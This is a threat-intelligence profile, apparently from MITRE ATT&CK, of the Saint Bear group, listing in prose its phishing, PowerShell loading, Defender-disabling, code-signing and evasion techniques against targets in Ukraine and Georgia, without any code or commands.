Saint Bear is a Russian-nexus threat actor active since early 2021, primarily targeting entities in Ukraine and Georgia. The group is notable for a specific remote access tool, Saint Bot, and information stealer, OutSteel in campaigns. Saint Bear typically relies on phishing or web staging of malicious documents and related file types for initial access, spoofing government or related entities.[1][2] Saint Bear has previously been confused with Ember Bear operations, but analysis of behaviors, tools, and targeting indicates these are distinct clusters.
Domain | ID | Name | Use | |
---|---|---|---|---|
Enterprise | T1583 | .006 | Acquire Infrastructure: Web Services |
Saint Bear has leveraged the Discord content delivery network to host malicious content for retrieval during initial access operations.[1] |
Enterprise | T1059 | Command and Scripting Interpreter |
Saint Bear has used the Windows Script Host (wscript) to execute intermediate files written to victim machines.[1] |
|
.001 | PowerShell |
Saint Bear relies extensively on PowerShell execution from malicious attachments and related content to retrieve and execute follow-on payloads.[1] |
||
.003 | Windows Command Shell |
Saint Bear initial loaders will also drop a malicious Windows batch file, available via open source GitHub repositories, that disables Microsoft Defender functionality.[1] |
||
.007 | JavaScript |
Saint Bear has delivered malicious Microsoft Office files containing an embedded JavaScript object that would, on execution, download and execute OutSteel and Saint Bot.[1] |
||
Enterprise | T1203 | Exploitation for Client Execution |
Saint Bear has leveraged vulnerabilities in client applications such as CVE-2017-11882 in Microsoft Office to enable code execution in victim environments.[1] |
|
Enterprise | T1589 | .002 | Gather Victim Identity Information: Email Addresses |
Saint Bear gathered victim email information in advance of phishing operations for targeted attacks.[1] |
Enterprise | T1562 | .001 | Impair Defenses: Disable or Modify Tools |
Saint Bear will modify registry entries and scheduled task objects associated with Windows Defender to disable its functionality.[1] |
Enterprise | T1656 | Impersonation |
Saint Bear has impersonated government and related entities in both phishing activity and developing web sites with malicious links that mimic legitimate resources.[2] |
|
Enterprise | T1112 | Modify Registry |
Saint Bear will leverage malicious Windows batch scripts to modify registry values associated with Windows Defender functionality.[1] |
|
Enterprise | T1027 | .002 | Obfuscated Files or Information: Software Packing |
Saint Bear clones .NET assemblies from other .NET binaries as well as cloning code signing certificates from other software to obfuscate the initial loader payload.[1] |
.013 | Obfuscated Files or Information: Encrypted/Encoded File |
Saint Bear initial payloads included encoded follow-on payloads located in the resources file of the first-stage loader.[1] |
||
Enterprise | T1566 | .001 | Phishing: Spearphishing Attachment |
Saint Bear uses a variety of file formats, such as Microsoft Office documents, ZIP archives, PDF documents, and other items as phishing attachments for initial access.[1] |
Enterprise | T1608 | .001 | Stage Capabilities: Upload Malware |
Saint Bear has used the Discord content delivery network for hosting malicious content referenced in links and emails.[1] |
Enterprise | T1553 | .002 | Subvert Trust Controls: Code Signing |
Saint Bear has used an initial loader malware featuring a legitimate code signing certificate associated with "Electrum Technologies GmbH."[1] |
Enterprise | T1204 | .001 | User Execution: Malicious Link |
Saint Bear has, in addition to email-based phishing attachments, used malicious websites masquerading as legitimate entities to host links to malicious files for user execution.[1][2] |
.002 | User Execution: Malicious File |
Saint Bear relies on user interaction and execution of malicious attachments and similar for initial execution on victim systems.[1] |
||
Enterprise | T1497 | Virtualization/Sandbox Evasion |
Saint Bear contains several anti-analysis and anti-virtualization checks.[1] |